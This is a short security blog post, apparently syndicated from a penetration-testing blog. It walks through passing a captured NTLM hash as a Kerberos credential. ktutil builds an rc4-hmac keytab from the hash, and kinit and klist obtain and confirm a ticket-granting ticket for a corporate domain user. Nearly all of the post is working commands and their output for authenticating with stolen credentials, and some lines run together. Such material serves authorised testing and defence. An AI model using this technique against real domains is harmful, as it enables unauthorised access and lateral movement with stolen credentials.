Pass the Hash with Kerberos

This blog post may be of limited use, most of the time that you have a NTLM hash you have the tools to use it. But, if you find yourself in a situation where you don’t have to tools and do have kerberos tools, you can pass the hash with it.

Lets say with have the NTLM hash for the user uberuser and the hash is 88e4d9fabaecf3dec18dd80905521b29. The first step to do so is to create a keytab file using ktutil:

root@wpad:~# ktutil

At the ktutil prompt, type in the “add entry” (addent) command with the “principle” (-p) flag. Specify the user and an all uppercase version of the FQDN. Then the “KVNO” (-k 1), which is the key number. Finally the encryption type, which is rc4-hmac for NTLM hashes:

ktutil: addent -p uberuser@CORP.SOMEWHATREALNEWS.COM -k 1 -key -e rc4-hmac

After you hit enter you’ll get prompted for the rc4-hmac (NTLM) hash:

Key for uberuser@CORP.SOMEWHATREALNEWS.COM (hex): 88e4d9fabaecf3dec18dd80905521b29

Then we write the keytab file to disk and exit ktutil

ktutil: wkt /tmp/a.keytabktutil: exit

The last step before we can use our authentication is to create a kerberos ticket using our keytab file.

root@wpad:~# kinit -V -k -t /tmp/a.keytab -f uberuser@CORP.SOMEWHATREALNEWS.COMUsing default cache: /tmp/krb5cc_0Using principal: uberuser@CORP.SOMEWHATREALNEWS.COMUsing keytab: /tmp/a.keytabAuthenticated to Kerberos v5

Validate it with klist:

root@wpad:~# klistTicket cache: FILE:/tmp/krb5cc_0Default principal: uberuser@CORP.SOMEWHATREALNEWS.COMValid starting       Expires              Service principal07/22/2018 21:38:43  07/23/2018 07:38:43  krbtgt/CORP.SOMEWHATREALNEWS.COM@CORP.SOMEWHATREALNEWS.COM	renew until 07/23/2018 21:38:40

*** This is a Security Bloggers Network syndicated blog from Malicious Link authored by Malicious Link. Read the original post at: